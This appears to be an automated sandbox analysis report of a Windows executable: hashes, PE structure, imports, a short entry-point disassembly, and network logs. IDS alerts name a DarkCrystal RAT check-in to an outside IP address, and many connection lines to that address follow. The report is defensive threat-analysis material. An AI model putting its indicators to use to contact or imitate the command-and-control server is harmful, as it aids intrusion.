                                        Category:dropped
                                        Size (bytes):151
                                        Entropy (8bit):4.857089018191496
                                        Encrypted:false
                                        SSDEEP:3:VLV993J+miJWEoJ8FXInmz/XKNrN/EKrv:Vx993DEUTD
                                        MD5:A23A1AE72308520F542FF0F07AD82AAB
                                        SHA1:B79A281EA271F5D79464C8F4CA893F5C308CA222
                                        SHA-256:B7CFD2549A791A04ECF4A830F6745A4E89CBA80BD5BA09FBB156C42D9781D67B
                                        SHA-512:398E24759D970FF457A5E6354038CC6B7FCFF8F99DD63AF48A4F651101815745E754296B1696B57E740BF9E5D8CC006F4232ABCC62FC60F1C50E2B003B95B26C
                                        Malicious:false
                                        Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 05/11/2024 03:54:16..03:54:16, error: 0x800705B4.03:54:22, error: 0x800705B4.
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.363101749271499
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:HcEvQKWAu2.exe
                                        File size:1'962'809 bytes
                                        MD5:3a92479aa98e55499bfa33bc2ea35b64
                                        SHA1:2645ee34fe180b3c775fec79729f5ecee1dab95f
                                        SHA256:cc8ffd463272f8abfb56f7f6c7a83ade8137e8df4c8cf39926469bf54efd1f71
                                        SHA512:137fe77d848b628a212e52fb9c8bac86c42914b51a2914f60676c3799e3c346a03c9122a54ed899888dbc58a59990f9cbd381212e08cfb82d071a577892d8d48
                                        SSDEEP:24576:2TbBv5rUyXV/SgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6re:IBJ/CFK3INhNIbDcykP+yiSf
                                        TLSH:1D95AF1369D2AE33D2A457718657423D9290D7223A25EF0F361F1497AE07BF18B722B3
                                        Icon Hash:1515d4d4442f2d2d
                                        Entrypoint:0x41f530
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                        Instruction
                                        call 00007FFA8506552Bh
                                        jmp 00007FFA85064E3Dh
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        push dword ptr [ebp+08h]
                                        mov esi, ecx
                                        call 00007FFA85057C87h
                                        mov dword ptr [esi], 004356D0h
                                        mov eax, esi
                                        pop esi
                                        pop ebp
                                        retn 0004h
                                        and dword ptr [ecx+04h], 00000000h
                                        mov eax, ecx
                                        and dword ptr [ecx+08h], 00000000h
                                        mov dword ptr [ecx+04h], 004356D8h
                                        mov dword ptr [ecx], 004356D0h
                                        ret
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        mov esi, ecx
                                        lea eax, dword ptr [esi+04h]
                                        mov dword ptr [esi], 004356B8h
                                        push eax
                                        call 00007FFA850682CFh
                                        test byte ptr [ebp+08h], 00000001h
                                        pop ecx
                                        je 00007FFA85064FCCh
                                        push 0000000Ch
                                        push esi
                                        call 00007FFA85064589h
                                        pop ecx
                                        pop ecx
                                        mov eax, esi
                                        pop esi
                                        pop ebp
                                        retn 0004h
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 0Ch
                                        lea ecx, dword ptr [ebp-0Ch]
                                        call 00007FFA85057C02h
                                        push 0043BEF0h
                                        lea eax, dword ptr [ebp-0Ch]
                                        push eax
                                        call 00007FFA85067D89h
                                        int3
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 0Ch
                                        lea ecx, dword ptr [ebp-0Ch]
                                        call 00007FFA85064F48h
                                        push 0043C0F4h
                                        lea eax, dword ptr [ebp-0Ch]
                                        push eax
                                        call 00007FFA85067D6Ch
                                        int3
                                        jmp 00007FFA85069807h
                                        int3
                                        int3
                                        int3
                                        int3
                                        push 00422900h
                                        push dword ptr fs:[00000000h]
                                        Programming Language:
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-05T08:12:16.386372+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.7 | 49720 | TCP
2024-11-05T08:12:18.601542+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49745 | 37.44.238.250 | 80 | TCP
2024-11-05T08:12:55.057943+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.7 | 49975 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Nov 5, 2024 08:12:32.066971064 CET4982880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:32.067051888 CET4982980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:32.067699909 CET4983580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:32.072177887 CET804982837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:32.072537899 CET804982937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:32.072652102 CET4982880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:32.073040009 CET804983537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:32.073077917 CET4982980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:32.073118925 CET4983580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:32.073221922 CET4983580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:32.078078985 CET804983537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:32.427608013 CET4983580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:32.432502985 CET804983537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:32.874933004 CET804983537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:32.927551031 CET4983580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:32.948268890 CET804983537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:32.948873997 CET4983580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:32.954225063 CET804983537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:32.954406977 CET4983580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:33.064383030 CET4984180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:33.069295883 CET804984137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:33.069366932 CET4984180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:33.069449902 CET4984180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:33.083301067 CET804984137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:33.427602053 CET4984180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:33.433301926 CET804984137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:33.900881052 CET804984137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:33.943094969 CET4984180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:33.982325077 CET804984137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:34.036803007 CET4984180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:34.094211102 CET4984180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:34.094779968 CET4985080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:34.099452972 CET804984137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:34.099518061 CET4984180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:34.099595070 CET804985037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:34.099666119 CET4985080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:34.099775076 CET4985080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:34.104954958 CET804985037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:34.458817005 CET4985080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:34.463788033 CET804985037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:34.918490887 CET804985037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:34.974303961 CET4985080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:34.995388985 CET804985037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:35.036835909 CET4985080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:35.111500025 CET4985080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:35.112142086 CET4985680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:35.116880894 CET804985037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:35.117041111 CET4985080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:35.117549896 CET804985637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:35.117623091 CET4985680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:35.117746115 CET4985680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:35.122703075 CET804985637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:35.474378109 CET4985680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:35.479295969 CET804985637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:35.919531107 CET804985637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:35.974389076 CET4985680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:35.998197079 CET804985637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:36.052429914 CET4985680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.111371040 CET4985680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.112030029 CET4986280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.116563082 CET804985637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:36.116624117 CET4985680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.116889954 CET804986237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:36.116962910 CET4986280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.117089987 CET4986280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.121886969 CET804986237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:36.474409103 CET4986280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.480658054 CET804986237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:36.680318117 CET4986480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.680521011 CET4986280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.685206890 CET804986437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:36.685277939 CET4986480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.685391903 CET4986480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.690272093 CET804986437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:36.700706005 CET804986237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:36.700771093 CET4986280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.803356886 CET4986780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.808471918 CET804986737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:36.808577061 CET4986780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.808707952 CET4986780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:36.814378977 CET804986737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.036915064 CET4986480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.041811943 CET804986437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.041955948 CET804986437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.162015915 CET4986780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.166941881 CET804986737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.508275986 CET804986437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.552426100 CET4986480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.590838909 CET804986437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.618966103 CET804986737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.630562067 CET4986480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.661813021 CET4986780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.691761971 CET804986737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.739955902 CET4986780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.821794987 CET4986480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.821949959 CET4986780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.822715998 CET4987580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.826915979 CET804986437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.827003002 CET4986480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.827543974 CET804987537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.827554941 CET804986737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:37.827630997 CET4986780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.827645063 CET4987580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.827774048 CET4987580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:37.832792044 CET804987537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:38.177613020 CET4987580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:38.183350086 CET804987537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:38.666007042 CET804987537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:38.708674908 CET4987580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:38.744168043 CET804987537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:38.744396925 CET4987580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:38.754067898 CET804987537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:38.754153013 CET4987580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:38.866861105 CET4988180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:38.875206947 CET804988137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:38.875298023 CET4988180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:38.875508070 CET4988180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:38.884814024 CET804988137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:39.224459887 CET4988180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:39.229517937 CET804988137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:39.685066938 CET804988137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:39.739902020 CET4988180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:39.768563032 CET804988137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:39.818166018 CET4988180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:39.899235010 CET4988180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:39.899988890 CET4988880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:39.906615973 CET804988137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:39.906672001 CET4988180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:39.907155037 CET804988837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:39.907279015 CET4988880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:39.907449961 CET4988880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:39.912492037 CET804988837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:40.256994009 CET4988880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:40.262542963 CET804988837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:40.717376947 CET804988837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:40.771164894 CET4988880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:40.788028002 CET804988837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:40.833655119 CET4988880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:40.906780958 CET4988880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:40.907466888 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:40.912039042 CET804988837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:40.912106037 CET4988880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:40.912292957 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:40.912358046 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:40.912460089 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:40.917459011 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.271466970 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.276340961 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.732081890 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.786782026 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.812880039 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.864902973 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.939951897 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.940392971 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.945493937 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.945569992 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.945745945 CET804990037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.945822001 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.945900917 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.950989008 CET804990037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.302489996 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.307518959 CET804990037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.627599001 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.627995968 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.633090019 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.633161068 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.633456945 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.633676052 CET804990037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.633728981 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.638983965 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.975450039 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.980346918 CET804990737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.980416059 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.980545044 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.985826969 CET804990737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.990045071 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.994877100 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.994929075 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.333689928 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.338736057 CET804990737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.447751045 CET804990637.44.238.250192.168.2.7
